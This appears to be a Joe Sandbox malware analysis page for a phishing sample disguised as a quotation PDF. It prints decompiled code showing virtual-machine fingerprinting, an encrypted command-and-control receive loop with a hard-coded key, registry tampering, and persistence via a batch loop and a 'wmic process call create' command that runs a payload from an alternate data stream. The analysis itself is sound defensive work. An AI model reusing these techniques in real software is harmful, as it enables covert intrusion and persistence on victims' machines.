Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: ObjectSingleWaitgetaddrinfolstrcatsocket
String ID: N$<$Ws2_32.dll$connect$pREw
API String ID: 3472416110-3765242851
Opcode ID: 16fe227ea6400947022d4c88f425a7b87e99211b0206ebf6ab2d21759e1f455a
Instruction ID: a951e8e021508cada5189fd56a629c3ca52201bdf19319a1a857bed6866df451
Opcode Fuzzy Hash: 16fe227ea6400947022d4c88f425a7b87e99211b0206ebf6ab2d21759e1f455a
Instruction Fuzzy Hash: DD510770A00208EFEB10DF94D989BEDBBB0BF04315F608069E905BB2D1D779AA55CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041E344 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 163
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E0041E344(intOrPtr __eax, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				intOrPtr _v56;
				signed short _v64;
				intOrPtr _t83;

				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0); // executed
				_v44 = __eax;
				__imp__CoInitialize(0);
				_v8 = __eax;
				if(_v8 >= 0) {
					_v12 = _v12 & 0x00000000;
					_t83 = E004045FD( &_v12);
					__imp__CoCreateInstance( &E00426380, 0, 0x17, 0x42a41c, _t83); // executed
					_v8 = _t83;
					if(_v8 >= 0) {
						_v16 = _v16 & 0x00000000;
						_v28 =  *((intOrPtr*)( *_v12 + 0xc));
						_v8 = _v28(_v12, L"root\\CIMV2", 0, 0, 0, 0x80, 0, 0,  &_v16);
						if(_v8 >= 0) {
							_v24 = _v24 & 0x00000000;
							_v32 =  *((intOrPtr*)( *_v16 + 0x50));
							_v8 = _v32(_v16, L"WQL", L"SELECT Name FROM Win32_VideoController", 0x20, 0,  &_v24);
							if(_v8 >= 0) {
								_v20 = _v20 & 0x00000000;
								while(1) {
									_v36 =  *((intOrPtr*)( *_v24 + 0x10));
									_v8 = _v36(_v24, 0xffffffff, 1,  &_v20,  &_v48);
									if(_v8 == 1) {
										break;
									}
									if(_v8 >= 0) {
										__imp__#8( &_v64);
										_v40 =  *((intOrPtr*)( *_v20 + 0x10));
										_push(0);
										_push(0);
										_push( &_v64);
										_push(0);
										_push(L"Name");
										_push(_v20);
										if(_v40() < 0 || (_v64 & 0x0000ffff) != 8) {
											 *((intOrPtr*)( *_v20 + 8))(_v20);
											continue;
										} else {
											E00406F64(_a4, _v56); // executed
											return _a4;
										}
									}
									break;
								}
								 *((intOrPtr*)( *_v24 + 8))(_v24);
								 *((intOrPtr*)( *_v16 + 8))(_v16);
								return  *((intOrPtr*)( *_v12 + 8))(_v12);
							}
							 *((intOrPtr*)( *_v12 + 8))(_v12);
							 *((intOrPtr*)( *_v16 + 8))(_v16);
							E00406F64(_a4, 0x4298c4);
							return _a4;
						}
						 *((intOrPtr*)( *_v12 + 8))(_v12);
						E00406F64(_a4, 0x429844);
						return _a4;
					}
					E00406F64(_a4, 0x42983c);
					return _a4;
				}
				E00406F64(_a4, 0x429840);
				return _a4;
			}

0x0041e35c
0x0041e362
0x0041e367
0x0041e36d
0x0041e374
0x0041e38b
0x0041e393
0x0041e3a8
0x0041e3ae
0x0041e3b5
0x0041e3cc
0x0041e3d8
0x0041e3f9
0x0041e400
0x0041e422
0x0041e42e
0x0041e449
0x0041e450
0x0041e47d
0x0041e481
0x0041e489
0x0041e49e
0x0041e4a5
0x00000000
0x00000000
0x0041e4ab
0x0041e4b3
0x0041e4c1
0x0041e4c4
0x0041e4c6
0x0041e4cb
0x0041e4cc
0x0041e4ce
0x0041e4d3
0x0041e4db
0x0041e508
0x00000000
0x0041e4e6
0x0041e4ec
0x00000000
0x0041e4f1
0x0041e4db
0x00000000
0x0041e4ad
0x0041e518
0x0041e523
0x00000000
0x0041e52e
0x0041e45a
0x0041e465
0x0041e470
0x00000000
0x0041e475
0x0041e40a
0x0041e415
0x00000000
0x0041e41a
0x0041e3bf
0x00000000
0x0041e3c4
0x0041e37e
0x00000000

APIs

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0041E35C
CoInitialize.OLE32(00000000), ref: 0041E367
CoCreateInstance.OLE32(00426380,00000000,00000017,0042A41C,00000000), ref: 0041E3A8

Part of subcall function 00406F64: lstrlenW.KERNEL32( B,00003000,00000000,?,004220E3,?), ref: 00406F73
Part of subcall function 00406F64: lstrlenW.KERNEL32(0000000A,004220E3,?), ref: 00406F8D
Part of subcall function 00406F64: lstrcpyW.KERNEL32 ref: 00406FAF

Strings

SELECT Name FROM Win32_VideoController, xrefs: 0041E439
root\CIMV2, xrefs: 0041E3EE
WQL, xrefs: 0041E43E
Name, xrefs: 0041E4CE

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: Initializelstrlen$CreateInstanceSecuritylstrcpy
String ID: Name$SELECT Name FROM Win32_VideoController$WQL$root\CIMV2
API String ID: 3415450516-3227336550
Opcode ID: 9e6395706689fc8df6a3437d623f65a6a57e786f43dafcecadd52255925fc418
Instruction ID: 7b5d0bbca1c232bd3c88c86801f1c7b00a6d54b9547362939575c4c6e6fe3e12
Opcode Fuzzy Hash: 9e6395706689fc8df6a3437d623f65a6a57e786f43dafcecadd52255925fc418
Instruction Fuzzy Hash: CA61B574A40208FFDB00DF95D949FADBBB5EF08715F208066F911AB2A0D774AE81DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA23 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 184
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E0040AA23(signed int __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				intOrPtr _v36;
				char _v44;
				char _v52;
				char _v56;
				char _v60;
				intOrPtr _v64;
				char _v72;
				char _v80;
				char _v88;
				signed int _v92;
				char _v65628;
				intOrPtr _t90;
				void* _t96;
				signed int _t101;
				signed int _t137;
				intOrPtr _t146;
				signed int _t154;
				char* _t160;
				char* _t175;
				void* _t189;
				void* _t190;
				void* _t191;

				_t154 = __ecx;
				E004012A0(0x10058, __ecx);
				_v12 = _t154;
				_v8 = _v8 & 0x00000000;
				_t90 = _v12;
				if( *((intOrPtr*)(_t90 + 0xc)) != 0xffffffff) {
					_v56 = 0xea60;
					__imp__#21( *((intOrPtr*)(_v12 + 0xc)), 0xffff, 0x1006,  &_v56, 4); // executed
					E0040132F( &_v65628, 0, 0xffff);
					_t191 = _t190 + 0xc;
					E00406692( &_v88);
					_t96 = E00406B58( &_v60, "nevergonnagiveyouup"); // executed
					E00406651( &_v44, _t96);
					E00406B06(); // executed
					E00406692( &_v28);
					do {
						_v16 = _v16 & 0x00000000;
						_v20 = _v20 & 0x00000000;
						_v32 = _v32 & 0x00000000;
						_t101 = _v12;
						__imp__#16( *((intOrPtr*)(_t101 + 0xc)),  &_v65628, 0xc, 0); // executed
						_v8 = _t101;
						__eflags = _v8 - 0xc;
						if(_v8 != 0xc) {
							L11:
							__eflags = _v8 - 0xffffffff;
							if(_v8 != 0xffffffff) {
								goto L13;
							}
							E004066DA();
							E004066DA();
							return E004066DA();
						}
						__eflags = _v8 - 0xffffffff;
						if(_v8 == 0xffffffff) {
							goto L11;
						}
						_v92 = _v92 & 0x00000000;
						E00406692( &_v52);
						_t175 =  &_v52;
						E00406598(_t175,  &_v65628, 0xc);
						_push(_t175);
						_t176 = _t191;
						E004066FC(_t191,  &_v52);
						E004066FC(_t191,  &_v44);
						E0040BA16(__eflags,  &_v72, _t191, _t176, _t175);
						_t191 = _t191 + 0x14;
						_v20 = E004066B9( &_v72, 4) + 0xc;
						_t137 = _v20 - 0xc;
						__eflags = _t137;
						_v16 = _t137;
						if(_t137 == 0) {
							L10:
							E004066DA();
							E004066DA();
							goto L13;
						} else {
							goto L6;
						}
						while(1) {
							L6:
							__eflags = _v16 + 0xc - _v8;
							if(_v16 + 0xc == _v8) {
								goto L10;
							}
							_v32 = _v20 - _v8;
							_t146 = _v12;
							__imp__#16( *((intOrPtr*)(_t146 + 0xc)), _t189 + _v8 - 0x10058, _v32, 0);
							_v36 = _t146;
							__eflags = _v36 - 0xffffffff;
							if(_v36 != 0xffffffff) {
								_v8 = _v8 + _v36;
								continue;
							}
							E004066DA();
							E004066DA();
							E004066DA();
							E004066DA();
							return E004066DA();
						}
						goto L10;
						L13:
						_t160 =  &_v28;
						E00406598(_t160,  &_v65628, _v8);
						_push(_t160);
						_t161 = _t191;
						E004066FC(_t191,  &_v28);
						E004066FC(_t191,  &_v44);
						E0040BA16(__eflags,  &_v80, _t191, _t161, _t160);
						_t191 = _t191 + 0x14;
						E004065E7();
						_v64 = _v12 + 0x10;
						E00406598(_v64, E004066AB( &_v80), _v8);
						E004065E7();
						E004065E7();
						E0040986B(_v12, _a4); // executed
						E004066DA();
						__eflags = _v8;
					} while (_v8 > 0);
					E004066DA();
					E004066DA();
					return E004066DA();
				}
				return _t90;
			}

0x0040aa23
0x0040aa2b
0x0040aa30
0x0040aa33
0x0040aa37
0x0040aa3e
0x0040aa45
0x0040aa62
0x0040aa76
0x0040aa7b
0x0040aa81
0x0040aa8e
0x0040aa97
0x0040aa9f
0x0040aaa7
0x0040aaac
0x0040aaac
0x0040aab0
0x0040aab4
0x0040aac3
0x0040aac9
0x0040aacf
0x0040aad2
0x0040aad6
0x0040abc7
0x0040abc7
0x0040abcb
0x00000000
0x00000000
0x0040abd0
0x0040abd8
0x00000000
0x0040abe0
0x0040aadc
0x0040aae0
0x00000000
0x00000000
0x0040aae6
0x0040aaed
0x0040aafb
0x0040aafe
0x0040ab03
0x0040ab05
0x0040ab0b
0x0040ab18
0x0040ab21
0x0040ab26
0x0040ab36
0x0040ab3c
0x0040ab3c
0x0040ab3f
0x0040ab42
0x0040abb5
0x0040abb8
0x0040abc0
0x00000000
0x00000000
0x00000000
0x00000000
0x0040ab44
0x0040ab44
0x0040ab4a
0x0040ab4d
0x00000000
0x00000000
0x0040ab55
0x0040ab68
0x0040ab6e
0x0040ab74
0x0040ab77
0x0040ab7b
0x0040abb0
0x00000000
0x0040abb0
0x0040ab80
0x0040ab88
0x0040ab90
0x0040ab98
0x00000000
0x0040aba0
0x00000000
0x0040abea
0x0040abf4
0x0040abf7
0x0040abfc
0x0040abfe
0x0040ac04
0x0040ac11
0x0040ac1a
0x0040ac1f
0x0040ac28
0x0040ac33
0x0040ac45
0x0040ac4d
0x0040ac55
0x0040ac60
0x0040ac68
0x0040ac6d
0x0040ac6d
0x0040ac7a
0x0040ac82
0x00000000
0x0040ac8a
0x00000000

APIs

setsockopt.WS2_32(000000FF,0000FFFF,00001006,0000EA60,00000004), ref: 0040AA62
recv.WS2_32(000000FF,?,0000000C,00000000), ref: 0040AAC9
recv.WS2_32(000000FF,?,00000000,00000000), ref: 0040AB6E

Strings

`, xrefs: 0040AA45
nevergonnagiveyouup, xrefs: 0040AA86

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: recv$setsockopt
String ID: `$nevergonnagiveyouup
API String ID: 833079357-2836534208
Opcode ID: f25da99ef3b2d7ebed897d6817bd750929ad0ab2fbf58239746df34a814c36f2
Instruction ID: 9c3caf913b8143312164038436c71cf331e6f25931ee7c4670f2be6c0976a970
Opcode Fuzzy Hash: f25da99ef3b2d7ebed897d6817bd750929ad0ab2fbf58239746df34a814c36f2
Instruction Fuzzy Hash: 8F715571D00208ABCB04EBE5DC92EEEB778AF14318F11457EE502B21D1DB786A69CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040B853 Relevance: 3.0, APIs: 2, Instructions: 9
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B853(void* _a4) {
				char _t3;

				_t3 = RtlFreeHeap(GetProcessHeap(), 0, _a4); // executed
				return _t3;
			}

0x0040b862
0x0040b869

APIs

GetProcessHeap.KERNEL32(00000000,?,?,004066F3,004241D6,00424186,?,0040B459,004241A6,?,00420A5E,?,?,004241D6), ref: 0040B85B
RtlFreeHeap.NTDLL(00000000,?,004066F3,004241D6,00424186,?,0040B459,004241A6,?,00420A5E,?,?,004241D6), ref: 0040B862

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 2da780426fd44fd4ebd0af6a823cb61ccaa5b2d0815ac32650a9e433b2ec0095
Instruction ID: c6f5d55ada5fb4439dede723716d493e6419f8d81db2d5a1792d842f1f575f2e
Opcode Fuzzy Hash: 2da780426fd44fd4ebd0af6a823cb61ccaa5b2d0815ac32650a9e433b2ec0095
Instruction Fuzzy Hash: ADB09B35144208BBCE105FE1EC0DB853F5DDB04651F410410F70D45150C6715451575D

Uniqueness

Uniqueness Score: -1.00%

Function 0041E533 Relevance: .1, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0041E533(intOrPtr __edx, WCHAR** _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				intOrPtr _v20;
				char** _v24;
				char _v28;
				void* _v40;
				signed int _v44;
				void* _v76;
				void* _v92;
				void _v108;
				signed int _t49;
				char** _t55;
				intOrPtr _t67;
				signed int _t70;
				intOrPtr _t79;
				intOrPtr* _t87;
				intOrPtr* _t89;
				void* _t93;

				_t79 = __edx;
				_v44 = _v44 | 0xffffffff;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v8 = _v8 & 0x00000000;
				_t87 =  &_v44;
				asm("cpuid");
				 *_t87 = 0x80000000;
				 *((intOrPtr*)(_t87 + 4)) = _t67;
				 *((intOrPtr*)(_t87 + 8)) = 0;
				 *((intOrPtr*)(_t87 + 0xc)) = __edx;
				_t49 = 4;
				_v20 =  *((intOrPtr*)(_t93 + _t49 * 0 - 0x28));
				_v8 = 0x80000000;
				while(_v8 <= _v20) {
					_t89 =  &_v44;
					asm("cpuid");
					 *_t89 = _v8;
					 *((intOrPtr*)(_t89 + 4)) = _t67;
					 *((intOrPtr*)(_t89 + 8)) = 0;
					 *((intOrPtr*)(_t89 + 0xc)) = _t79;
					if(_v8 != 0x80000002) {
						__eflags = _v8 - 0x80000003;
						if(_v8 != 0x80000003) {
							__eflags = _v8 - 0x80000004;
							if(_v8 == 0x80000004) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
							}
						} else {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
						}
					} else {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					_v8 = _v8 + 1;
				}
				_v12 = E00401000(0x200);
				_t70 = 0x10;
				memcpy(_v12,  &_v108, _t70 << 2);
				_t55 = E00406B58( &_v28, _v12); // executed
				_v24 = _t55;
				E00406770(_v24, __eflags,  &_v16); // executed
				E00406B06(); // executed
				E00401014(_v12);
				E00406FBC(_a4,  &_v16); // executed
				E00406BE2(); // executed
				return _a4;
			}

0x0041e533
0x0041e53c
0x0041e545
0x0041e546
0x0041e547
0x0041e548
0x0041e54c
0x0041e556
0x0041e558
0x0041e55a
0x0041e55d
0x0041e560
0x0041e565
0x0041e56d
0x0041e570
0x0041e580
0x0041e588
0x0041e590
0x0041e592
0x0041e594
0x0041e597
0x0041e59a
0x0041e5a4
0x0041e5b2
0x0041e5b9
0x0041e5c7
0x0041e5ce
0x0041e5d6
0x0041e5d7
0x0041e5d8
0x0041e5d9
0x0041e5d9
0x0041e5bb
0x0041e5c1
0x0041e5c2
0x0041e5c3
0x0041e5c4
0x0041e5c4
0x0041e5a6
0x0041e5ac
0x0041e5ad
0x0041e5ae
0x0041e5af
0x0041e5af
0x0041e57d
0x0041e57d
0x0041e5e7
0x0041e5ec
0x0041e5f3
0x0041e5fb
0x0041e600
0x0041e60a
0x0041e612
0x0041e61a
0x0041e627
0x0041e62f
0x0041e63b

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40b0de539bf4df7c73c8680cd79c887d15db265aef6ab460a0af38f81b019cd0
Instruction ID: e651ac8b4149f6058f216ec9a121f5ba9a010eb402db76d187385b63b63799ae
Opcode Fuzzy Hash: 40b0de539bf4df7c73c8680cd79c887d15db265aef6ab460a0af38f81b019cd0
Instruction Fuzzy Hash: 99314875C00609EFCF15CF95C441ADEBBB1FF08324F20842AE916BB290D774AA86CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004240BA Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E004240BA(void* __edx, void* __eflags) {
				char _v5;
				signed int _v12;
				CHAR* _v16;
				void* _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				long _v44;
				signed int _v48;
				int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				signed int _v84;
				char _v172;
				char _v308;
				char _v568;
				short _v1088;
				char _v1676;
				intOrPtr _t101;
				CHAR* _t104;
				signed int _t135;
				signed int _t136;
				signed int _t138;
				void* _t139;
				signed int _t151;
				signed int _t152;
				void* _t161;
				void* _t175;
				void* _t211;

				_t215 = __eflags;
				_t211 = __edx;
				_v52 = _v52 & 0x00000000;
				_v28 = 0xa;
				E0040B3D6( &_v172, __eflags);
				E004212E8( &_v308, _t215);
				E00401028(GetTickCount());
				GetModuleFileNameA(0,  &_v568, 0x104);
				E00422285( &_v5);
				_v12 = _v12 & 0x00000000;
				_t101 = E0042211F( &_v568,  &_v12); // executed
				_v40 = _t101;
				_t216 = _v12;
				if(_v12 == 0) {
					_v36 = _v36 & 0x00000000;
					E00422116(_t101,  &_v5);
					E00420A38( &_v308, _t216);
					E0040B447( &_v172, _t216);
					return _v36;
				}
				_v24 = _v24 & 0x00000000;
				E00421C2F(_t211, _v40, _v12, 0x215a,  &_v24);
				_t104 = E00401000(0x20);
				_pop(_t175);
				_v16 = _t104;
				E00404E39(_t175, _v16, 0x20);
				 *_v16 = _v24;
				 *0x5601f4 = CreateEventA(0, 0, 0, _v16);
				_v44 = GetLastError();
				__eflags = _v44 - 0xb7;
				if(__eflags == 0) {
					L4:
					_v48 = _v48 & 0x00000000;
					E00422116(_t108,  &_v5);
					E00420A38( &_v308, __eflags);
					E0040B447( &_v172, __eflags);
					return _v48;
				} else {
					__eflags =  *0x5601f4;
					if(__eflags != 0) {
						RegCreateKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", 0, 0, 0, 0xf003f, 0,  &_v20,  &_v52); // executed
						RegSetValueExA(_v20, "MaxConnectionsPer1_0Server", 0, 4,  &_v28, 4); // executed
						RegSetValueExA(_v20, "MaxConnectionsPerServer", 0, 4,  &_v28, 4); // executed
						RegCloseKey(_v20);
						E0040B047( &_v172, __eflags); // executed
						E00421037( &_v308, __eflags,  &_v172); // executed
						E004097AC( &_v1676, __eflags,  &_v172,  &_v308); // executed
						E004203D2( &_v32);
						E0040132F( &_v1088, 0, 0x208);
						__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v1088); // executed
						lstrcatW( &_v1088, L"\\Microsoft Vision\\");
						CreateDirectoryW( &_v1088, 0); // executed
						_t135 = E0040AFA5( &_v172);
						__eflags = _t135;
						if(_t135 != 0) {
							_t161 = E0041E932();
							__eflags = _t161 - 1;
							if(_t161 != 1) {
								__eflags = E0041DF16() - 0xa;
								if(__eflags < 0) {
									E004218D5( &_v172, __eflags);
								} else {
									E00421978( &_v172, __eflags);
								}
							}
						}
						_t136 = E0040AF96( &_v172);
						__eflags = _t136;
						if(_t136 != 0) {
							__eflags = E0041E932() - 1;
							if(__eflags == 0) {
								E00423AAC(__eflags);
								Sleep(0xbb8);
							}
						}
						__eflags = E00404E64( &_v308);
						if(__eflags != 0) {
							_t138 = E0040AFB4( &_v172);
							__eflags = _t138;
							if(_t138 != 0) {
								E00422291();
							}
							_t139 = E004096E8( &_v1676);
						} else {
							_v56 = E0040AFFD( &_v172);
							_v60 = E0040B00C( &_v172);
							_v64 = E0040B038( &_v172);
							E00420AAA( &_v308, __eflags, _v64, _v60, _v56); // executed
							_t151 = E0040B038( &_v172);
							__eflags = _t151;
							if(_t151 == 0) {
								_t152 = E0040AFB4( &_v172);
								__eflags = _t152;
								if(_t152 != 0) {
									E00422291();
								}
								_t139 = E004096E8( &_v1676); // executed
							} else {
								_v68 = E00406F52( &_v80);
								_v72 = E00404E73( &_v308,  &_v76);
								E00420351( &_v32, __eflags, _v72, _v68, 0);
								E00406BE2();
								_t139 = E00406BE2();
							}
						}
						_t84 =  &_v84;
						 *_t84 = _v84 & 0x00000000;
						__eflags =  *_t84;
						E00420425(_t139,  &_v32);
						E00422116(E0040920E( &_v1676, __eflags),  &_v5);
						E00420A38( &_v308, __eflags);
						E0040B447( &_v172, __eflags);
						return _v84;
					}
					goto L4;
				}
			}

0x004240ba
0x004240ba
0x004240c3
0x004240c7
0x004240d4
0x004240df
0x004240eb
0x004240ff
0x00424108
0x0042410d
0x0042411c
0x00424123
0x00424126
0x0042412a
0x0042412c
0x00424133
0x0042413e
0x00424149
0x00000000
0x0042414e
0x00424156
0x00424169
0x00424173
0x00424178
0x00424179
0x00424181
0x0042418e
0x0042419f
0x004241aa
0x004241ad
0x004241b4
0x004241bf
0x004241bf
0x004241c6
0x004241d1
0x004241dc
0x00000000
0x004241b6
0x004241b6
0x004241bd
0x00424208
0x00424220
0x00424238
0x00424241
0x0042424d
0x0042425f
0x00424278
0x00424280
0x00424293
0x004242aa
0x004242bc
0x004242cb
0x004242d7
0x004242dc
0x004242de
0x004242e0
0x004242e5
0x004242e8
0x004242ef
0x004242f2
0x004242fb
0x004242f4
0x004242f4
0x004242f4
0x004242f2
0x004242e8
0x00424306
0x0042430b
0x0042430d
0x00424314
0x00424317
0x00424319
0x00424323
0x00424323
0x00424317
0x00424334
0x00424336
0x004243ef
0x004243f4
0x004243f6
0x004243f8
0x004243f8
0x00424403
0x0042433c
0x00424347
0x00424355
0x00424363
0x00424375
0x00424380
0x00424385
0x00424387
0x004243ce
0x004243d3
0x004243d5
0x004243d7
0x004243d7
0x004243e2
0x00424389
0x00424391
0x004243a3
0x004243b1
0x004243b9
0x004243c1
0x004243c1
0x004243e7
0x00424408
0x00424408
0x00424408
0x0042440f
0x00424422
0x0042442d
0x00424438
0x00000000
0x0042443d
0x00000000
0x004241bd

APIs

GetTickCount.KERNEL32 ref: 004240E4
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004240FF

Part of subcall function 0042211F: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0042214C
Part of subcall function 0042211F: GetFileSize.KERNEL32(000000FF,00000000), ref: 00422166
Part of subcall function 0042211F: ReadFile.KERNEL32(?,!AB,?,00000000,00000000), ref: 00422186
Part of subcall function 0042211F: FindCloseChangeNotification.KERNEL32(?), ref: 0042219E

CreateEventA.KERNEL32(00000000,00000000,00000000,?), ref: 00424199
GetLastError.KERNEL32 ref: 004241A4

Strings

Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 004241FE
MaxConnectionsPerServer, xrefs: 00424230
\Microsoft Vision\, xrefs: 004242B0
MaxConnectionsPer1_0Server, xrefs: 00424218

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: File$Create$ChangeCloseCountErrorEventFindLastModuleNameNotificationReadSizeTick
String ID: MaxConnectionsPer1_0Server$MaxConnectionsPerServer$Software\Microsoft\Windows\CurrentVersion\Internet Settings$\Microsoft Vision\
API String ID: 3769544804-2552559493
Opcode ID: 1860c468fd7e0690f9757c42601e783b28964173deb81373075a05d7821a1b06
Instruction ID: 73eaf00561fa04221febf8761d79797c556d4de6561349caa70234f3ce85a5f8
Opcode Fuzzy Hash: 1860c468fd7e0690f9757c42601e783b28964173deb81373075a05d7821a1b06
Instruction Fuzzy Hash: 21A13071A00228AFDB14FBA1EC56BED7774EF14304F9040AAF605B20E1DF785A99CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00420AAA Relevance: 23.1, APIs: 3, Strings: 10, Instructions: 391
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E00420AAA(char __ecx, void* __eflags, signed int _a4, signed int _a8, signed int _a12) {
				char _v8;
				char _v12;
				char _v13;
				signed int _v14;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				intOrPtr _v108;
				char _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				char _v136;
				char _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				char _v160;
				char _v164;
				intOrPtr _v168;
				signed int _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				char _v192;
				signed int _v196;
				char _v200;
				signed int _v204;
				char _v212;
				char _v220;
				intOrPtr _t182;
				signed int _t184;
				void* _t187;
				signed int _t201;
				signed int _t211;
				void* _t277;
				void* _t295;
				void* _t404;
				void* _t420;

				_v8 = __ecx;
				E0041EA3F(__eflags,  &_v12); // executed
				E00406D2E(__eflags,  &_v36, 0xa); // executed
				_t4 =  &_v8; // 0x42437a
				_v56 =  *_t4;
				_t6 =  &_v8; // 0x42437a
				_t182 = E00420768(_v56, 0x80000001,  *_t6 + 0x10, 0xf003f, 1); // executed
				_v48 = _t182;
				_t9 =  &_v8; // 0x42437a, executed
				_t330 =  *_t9;
				E004207E9( *_t9); // executed
				if(_v48 == 0) {
					L5:
					_t61 =  &_v8; // 0x42437a
					_t184 = E004206FE( *_t61);
					__eflags = _t184;
					if(_t184 == 0) {
						_t62 =  &_v8; // 0x42437a
						_v108 =  *_t62;
						_t64 =  &_v8; // 0x42437a
						__eflags =  *_t64 + 0x10;
						E00420997(_v108, 0x80000001,  *_t64 + 0x10, 0xf003f, 0); // executed
					}
					__eflags = _a12;
					if(__eflags != 0) {
						__imp__SHGetKnownFolderPath( &E00426390, 0, 0,  &_v112);
						E00406F64( &_v20, _v112);
						E00406C53( &_v20, __eflags, L"\\programs.bat");
						E00406F64( &_v32, L"for /F \"usebackq tokens=*\" %%A in (\"");
						_v116 = E00406C53( &_v32, __eflags, E00406F44( &_v20));
						_v120 = E00406C53(_v116, __eflags, L":start");
						E00406C53(_v120, __eflags, L"\") do %%A");
						E00422285( &_v13);
						_v124 = E00406F1B( &_v32);
						_v128 = E00406B4A(E00406E4B( &_v32, __eflags,  &_v140));
						_v132 = E00406B4A(E00406E4B( &_v20, __eflags,  &_v136));
						E00421E99(_v132, _v128, _v124);
						E00406B06();
						E00406B06();
						_t92 =  &_v8; // 0x42437a
						E0041E9F8( &_v140, __eflags,  &_v28,  *((intOrPtr*)( *_t92 + 0xc)));
						E00406C53( &_v28, __eflags, L"\\Documents:ApplicationData");
						E00406F64( &_v24, L"wmic process call create \'\"");
						_v144 = E00406C53( &_v24, __eflags, E00406F44( &_v28));
						E00406C53(_v144, __eflags, L"\"\'");
						E00406C53( &_v20, __eflags, L":start");
						_v148 = E00406F1B( &_v24);
						_v152 = E00406B4A(E00406E4B( &_v24, __eflags,  &_v164));
